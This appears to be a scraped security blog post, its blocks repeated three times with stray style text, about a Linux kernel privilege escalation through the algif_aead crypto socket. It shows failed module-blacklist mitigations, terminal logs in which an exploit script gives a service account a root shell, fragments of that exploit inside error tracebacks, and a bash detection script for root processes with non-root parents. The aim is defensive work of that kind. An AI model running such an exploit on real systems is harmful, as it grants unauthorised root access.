$ echo "-weight: 500;">install algif_aead /bin/false" > /etc/modprobe.d/-weight: 500;">disable-algif.conf
rmmod algif_aead 2>/dev/null || true
echo "-weight: 500;">install algif_aead /bin/false" > /etc/modprobe.d/-weight: 500;">disable-algif.conf
rmmod algif_aead 2>/dev/null || true
echo "-weight: 500;">install algif_aead /bin/false" > /etc/modprobe.d/-weight: 500;">disable-algif.conf
rmmod algif_aead 2>/dev/null || true
chien-pang@pop-os:~/Downloads$ cat /etc/modprobe.d/-weight: 500;">disable-copyfail.conf
-weight: 500;">install algif_aead /bin/true
chien-pang@pop-os:~/Downloads$ lsmod | egrep -i "algif|aead"
algif_hash 16384 1
algif_skcipher 12288 1
af_alg 32768 6 algif_hash,algif_skcipher
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ modprobe algif_aead ; echo $?
0
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ ./copyFail30.py
Traceback (most recent call last): File "/home/chien-pang/Downloads/./copyFail30.py", line 36, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/chien-pang/Downloads/./copyFail30.py", line 30, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+\
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),]\
,32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
chien-pang@pop-os:~/Downloads$ id
uid=1000(chien-pang) gid=1000(chien-pang) groups=1000(chien-pang),4(adm),27(-weight: 600;">sudo),107(lpadmin)
chien-pang@pop-os:~/Downloads$ ls /root
ls: cannot open directory '/root': Permission denied
chien-pang@pop-os:~/Downloads$ cat /etc/modprobe.d/-weight: 500;">disable-copyfail.conf
-weight: 500;">install algif_aead /bin/true
chien-pang@pop-os:~/Downloads$ lsmod | egrep -i "algif|aead"
algif_hash 16384 1
algif_skcipher 12288 1
af_alg 32768 6 algif_hash,algif_skcipher
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ modprobe algif_aead ; echo $?
0
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ ./copyFail30.py
Traceback (most recent call last): File "/home/chien-pang/Downloads/./copyFail30.py", line 36, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/chien-pang/Downloads/./copyFail30.py", line 30, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+\
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),]\
,32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
chien-pang@pop-os:~/Downloads$ id
uid=1000(chien-pang) gid=1000(chien-pang) groups=1000(chien-pang),4(adm),27(-weight: 600;">sudo),107(lpadmin)
chien-pang@pop-os:~/Downloads$ ls /root
ls: cannot open directory '/root': Permission denied
chien-pang@pop-os:~/Downloads$ cat /etc/modprobe.d/-weight: 500;">disable-copyfail.conf
-weight: 500;">install algif_aead /bin/true
chien-pang@pop-os:~/Downloads$ lsmod | egrep -i "algif|aead"
algif_hash 16384 1
algif_skcipher 12288 1
af_alg 32768 6 algif_hash,algif_skcipher
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ modprobe algif_aead ; echo $?
0
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ ./copyFail30.py
Traceback (most recent call last): File "/home/chien-pang/Downloads/./copyFail30.py", line 36, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/chien-pang/Downloads/./copyFail30.py", line 30, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+\
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),]\
,32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
chien-pang@pop-os:~/Downloads$ id
uid=1000(chien-pang) gid=1000(chien-pang) groups=1000(chien-pang),4(adm),27(-weight: 600;">sudo),107(lpadmin)
chien-pang@pop-os:~/Downloads$ ls /root
ls: cannot open directory '/root': Permission denied
[cc2 ~]$ cat /proc/cmdline
BOOT_IMAGE=/Part2/bzImage root=UUID=571ee1af-1421-479d-845d-ea6b4f97292f ro net.ifnames=0 acpi=force intel_iommu=on amd_iommu=on iommu=pt console=ttyS0 console=tty0 initcall_blacklist=algif_aead_init
cc2 ~]# su - nova
Last login: Tue May 12 12:15:09 CST 2026 on pts/2
[nova@cc2 ~]$ id
uid=116(nova) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[nova@cc2 ~]$ ls /root ; echo $?
ls: cannot open directory '/root': Permission denied
2
[nova@cc2 ~]$ lsmod | egrep -i "algif|aead"
[nova@cc2 ~]$ /tmp/copyFail30.py
[cc2 /var/lib/nova]# id
uid=0(root) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[cc2 /var/lib/nova]# [cc2 /var/lib/nova]# ls /root ; echo $?
0
[cc2 ~]$ cat /proc/cmdline
BOOT_IMAGE=/Part2/bzImage root=UUID=571ee1af-1421-479d-845d-ea6b4f97292f ro net.ifnames=0 acpi=force intel_iommu=on amd_iommu=on iommu=pt console=ttyS0 console=tty0 initcall_blacklist=algif_aead_init
cc2 ~]# su - nova
Last login: Tue May 12 12:15:09 CST 2026 on pts/2
[nova@cc2 ~]$ id
uid=116(nova) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[nova@cc2 ~]$ ls /root ; echo $?
ls: cannot open directory '/root': Permission denied
2
[nova@cc2 ~]$ lsmod | egrep -i "algif|aead"
[nova@cc2 ~]$ /tmp/copyFail30.py
[cc2 /var/lib/nova]# id
uid=0(root) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[cc2 /var/lib/nova]# [cc2 /var/lib/nova]# ls /root ; echo $?
0
[cc2 ~]$ cat /proc/cmdline
BOOT_IMAGE=/Part2/bzImage root=UUID=571ee1af-1421-479d-845d-ea6b4f97292f ro net.ifnames=0 acpi=force intel_iommu=on amd_iommu=on iommu=pt console=ttyS0 console=tty0 initcall_blacklist=algif_aead_init
cc2 ~]# su - nova
Last login: Tue May 12 12:15:09 CST 2026 on pts/2
[nova@cc2 ~]$ id
uid=116(nova) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[nova@cc2 ~]$ ls /root ; echo $?
ls: cannot open directory '/root': Permission denied
2
[nova@cc2 ~]$ lsmod | egrep -i "algif|aead"
[nova@cc2 ~]$ /tmp/copyFail30.py
[cc2 /var/lib/nova]# id
uid=0(root) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[cc2 /var/lib/nova]# [cc2 /var/lib/nova]# ls /root ; echo $?
0
[cc2 /var/lib/nova]# grep af_alg /proc/kallsyms | tail
ffffffff98d52d20 r __ksymtab_af_alg_release_parent
ffffffff98d52d2c r __ksymtab_af_alg_sendmsg
ffffffff98d52d38 r __ksymtab_af_alg_unregister_type
ffffffff98d52d44 r __ksymtab_af_alg_wait_for_data
ffffffff98d52d50 r __ksymtab_af_alg_wmem_wakeup
ffffffff99f33ff0 t __pfx_af_alg_init
ffffffff99f34000 t af_alg_init
ffffffff9a185a10 d __initcall__kmod_af_alg__884_1325_af_alg_init6
ffffffff9a35b420 t __pfx_af_alg_exit
ffffffff9a35b430 t af_alg_exit
[cc2 /var/lib/nova]# grep af_alg /proc/kallsyms | tail
ffffffff98d52d20 r __ksymtab_af_alg_release_parent
ffffffff98d52d2c r __ksymtab_af_alg_sendmsg
ffffffff98d52d38 r __ksymtab_af_alg_unregister_type
ffffffff98d52d44 r __ksymtab_af_alg_wait_for_data
ffffffff98d52d50 r __ksymtab_af_alg_wmem_wakeup
ffffffff99f33ff0 t __pfx_af_alg_init
ffffffff99f34000 t af_alg_init
ffffffff9a185a10 d __initcall__kmod_af_alg__884_1325_af_alg_init6
ffffffff9a35b420 t __pfx_af_alg_exit
ffffffff9a35b430 t af_alg_exit
[cc2 /var/lib/nova]# grep af_alg /proc/kallsyms | tail
ffffffff98d52d20 r __ksymtab_af_alg_release_parent
ffffffff98d52d2c r __ksymtab_af_alg_sendmsg
ffffffff98d52d38 r __ksymtab_af_alg_unregister_type
ffffffff98d52d44 r __ksymtab_af_alg_wait_for_data
ffffffff98d52d50 r __ksymtab_af_alg_wmem_wakeup
ffffffff99f33ff0 t __pfx_af_alg_init
ffffffff99f34000 t af_alg_init
ffffffff9a185a10 d __initcall__kmod_af_alg__884_1325_af_alg_init6
ffffffff9a35b420 t __pfx_af_alg_exit
ffffffff9a35b430 t af_alg_exit
#!/usr/bin/bash Fmt() { printf "%-8s %-8s %-8s %-8s %-16s %-12s %s\n" \ "${1:-PID}" "${2:-PPID}" "${3:-UID}" "${4:-EUID}" "${5:-CapEff}" "${6:-ParentUID}" "${7:-CMD}"
} FmtHeader() { echo "------------------------------------------------------------------------------------------" Fmt
}
FmtContent() {o Fmt "$pid" "$ppid" "$uid" "$euid" "$capeff" "$parent_uid" "$cmd"
} FmtHeader
for pid in /proc/[0-9]*; do pid=${pid#/proc/} -weight: 500;">status="/proc/$pid/-weight: 500;">status" cmdline="/proc/$pid/cmdline" [[ -r "$-weight: 500;">status" ]] || continue uid=$(awk '/^Uid:/ {print $2}' "$-weight: 500;">status") euid=$(awk '/^Uid:/ {print $3}' "$-weight: 500;">status") capeff=$(awk '/^CapEff:/ {print $2}' "$-weight: 500;">status") ppid=$(awk '/^PPid:/ {print $2}' "$-weight: 500;">status") # read parent UID safely parent_uid="NA" if [[ -r "/proc/$ppid/-weight: 500;">status" ]]; then parent_uid=$(awk '/^Uid:/ {print $2}' "/proc/$ppid/-weight: 500;">status") fi # command name if [[ -r "$cmdline" ]]; then cmd=$(tr '\0' ' ' < "$cmdline") cmd=${cmd:0:80} else cmd="?" fi if [[ "$capeff" != "000001ffffffffff" || "$parent_uid" == "NA" ]] ; then continue else parent_cmdline="/proc/$ppid/cmdline" pcmd=$(tr '\0' ' ' < "$parent_cmdline") pcmd=${pcmd:0:80} fi if [[ "$uid" == "0" && "$parent_uid" != "0" ]]; then FmtContent echo "[!] ALERT: process ($pid[$(id -nu $uid)]) spawned from non-root parent ($ppid[$(id -nu $parent_uid)] $pcmd $(ps -o etime $ppid | tail -1 | xargs))" elif [[ "$parent_uid" != "0" ]]; then FmtContent echo "[!] WARN: capabilities detected in non-root lineage (PID $pid[$(id -nu $uid)])" elif [[ "$uid" != "$parent_uid" && "$uid" == "0" ]]; then FmtContent echo "[!] INFO: UID escalation detected (PID $pid[$(id -nu $uid)])" fi
done
#!/usr/bin/bash Fmt() { printf "%-8s %-8s %-8s %-8s %-16s %-12s %s\n" \ "${1:-PID}" "${2:-PPID}" "${3:-UID}" "${4:-EUID}" "${5:-CapEff}" "${6:-ParentUID}" "${7:-CMD}"
} FmtHeader() { echo "------------------------------------------------------------------------------------------" Fmt
}
FmtContent() {o Fmt "$pid" "$ppid" "$uid" "$euid" "$capeff" "$parent_uid" "$cmd"
} FmtHeader
for pid in /proc/[0-9]*; do pid=${pid#/proc/} -weight: 500;">status="/proc/$pid/-weight: 500;">status" cmdline="/proc/$pid/cmdline" [[ -r "$-weight: 500;">status" ]] || continue uid=$(awk '/^Uid:/ {print $2}' "$-weight: 500;">status") euid=$(awk '/^Uid:/ {print $3}' "$-weight: 500;">status") capeff=$(awk '/^CapEff:/ {print $2}' "$-weight: 500;">status") ppid=$(awk '/^PPid:/ {print $2}' "$-weight: 500;">status") # read parent UID safely parent_uid="NA" if [[ -r "/proc/$ppid/-weight: 500;">status" ]]; then parent_uid=$(awk '/^Uid:/ {print $2}' "/proc/$ppid/-weight: 500;">status") fi # command name if [[ -r "$cmdline" ]]; then cmd=$(tr '\0' ' ' < "$cmdline") cmd=${cmd:0:80} else cmd="?" fi if [[ "$capeff" != "000001ffffffffff" || "$parent_uid" == "NA" ]] ; then continue else parent_cmdline="/proc/$ppid/cmdline" pcmd=$(tr '\0' ' ' < "$parent_cmdline") pcmd=${pcmd:0:80} fi if [[ "$uid" == "0" && "$parent_uid" != "0" ]]; then FmtContent echo "[!] ALERT: process ($pid[$(id -nu $uid)]) spawned from non-root parent ($ppid[$(id -nu $parent_uid)] $pcmd $(ps -o etime $ppid | tail -1 | xargs))" elif [[ "$parent_uid" != "0" ]]; then FmtContent echo "[!] WARN: capabilities detected in non-root lineage (PID $pid[$(id -nu $uid)])" elif [[ "$uid" != "$parent_uid" && "$uid" == "0" ]]; then FmtContent echo "[!] INFO: UID escalation detected (PID $pid[$(id -nu $uid)])" fi
done
#!/usr/bin/bash Fmt() { printf "%-8s %-8s %-8s %-8s %-16s %-12s %s\n" \ "${1:-PID}" "${2:-PPID}" "${3:-UID}" "${4:-EUID}" "${5:-CapEff}" "${6:-ParentUID}" "${7:-CMD}"
} FmtHeader() { echo "------------------------------------------------------------------------------------------" Fmt
}
FmtContent() {o Fmt "$pid" "$ppid" "$uid" "$euid" "$capeff" "$parent_uid" "$cmd"
} FmtHeader
for pid in /proc/[0-9]*; do pid=${pid#/proc/} -weight: 500;">status="/proc/$pid/-weight: 500;">status" cmdline="/proc/$pid/cmdline" [[ -r "$-weight: 500;">status" ]] || continue uid=$(awk '/^Uid:/ {print $2}' "$-weight: 500;">status") euid=$(awk '/^Uid:/ {print $3}' "$-weight: 500;">status") capeff=$(awk '/^CapEff:/ {print $2}' "$-weight: 500;">status") ppid=$(awk '/^PPid:/ {print $2}' "$-weight: 500;">status") # read parent UID safely parent_uid="NA" if [[ -r "/proc/$ppid/-weight: 500;">status" ]]; then parent_uid=$(awk '/^Uid:/ {print $2}' "/proc/$ppid/-weight: 500;">status") fi # command name if [[ -r "$cmdline" ]]; then cmd=$(tr '\0' ' ' < "$cmdline") cmd=${cmd:0:80} else cmd="?" fi if [[ "$capeff" != "000001ffffffffff" || "$parent_uid" == "NA" ]] ; then continue else parent_cmdline="/proc/$ppid/cmdline" pcmd=$(tr '\0' ' ' < "$parent_cmdline") pcmd=${pcmd:0:80} fi if [[ "$uid" == "0" && "$parent_uid" != "0" ]]; then FmtContent echo "[!] ALERT: process ($pid[$(id -nu $uid)]) spawned from non-root parent ($ppid[$(id -nu $parent_uid)] $pcmd $(ps -o etime $ppid | tail -1 | xargs))" elif [[ "$parent_uid" != "0" ]]; then FmtContent echo "[!] WARN: capabilities detected in non-root lineage (PID $pid[$(id -nu $uid)])" elif [[ "$uid" != "$parent_uid" && "$uid" == "0" ]]; then FmtContent echo "[!] INFO: UID escalation detected (PID $pid[$(id -nu $uid)])" fi
done
[cc2 ~]# bash /tmp/copying-fail-detect.sh
------------------------------------------------------------------------------------------
PID PPID UID EUID CapEff ParentUID CMD
2988938 2988937 0 0 000001ffffffffff 116
[!] ALERT: process (2988938[root]) spawned from non-root parent (2988937[nova] python3 /tmp/copyFail30.py 36:16)
...(truncated)...
[cc2 ~]# bash /tmp/copying-fail-detect.sh
------------------------------------------------------------------------------------------
PID PPID UID EUID CapEff ParentUID CMD
2988938 2988937 0 0 000001ffffffffff 116
[!] ALERT: process (2988938[root]) spawned from non-root parent (2988937[nova] python3 /tmp/copyFail30.py 36:16)
...(truncated)...
[cc2 ~]# bash /tmp/copying-fail-detect.sh
------------------------------------------------------------------------------------------
PID PPID UID EUID CapEff ParentUID CMD
2988938 2988937 0 0 000001ffffffffff 116
[!] ALERT: process (2988938[root]) spawned from non-root parent (2988937[nova] python3 /tmp/copyFail30.py 36:16)
...(truncated)... - Remediations takes long
- Rolling-out new kernel is a painful operation
- Mitigation recommendations may not work
- Mitigation recommendations could break features
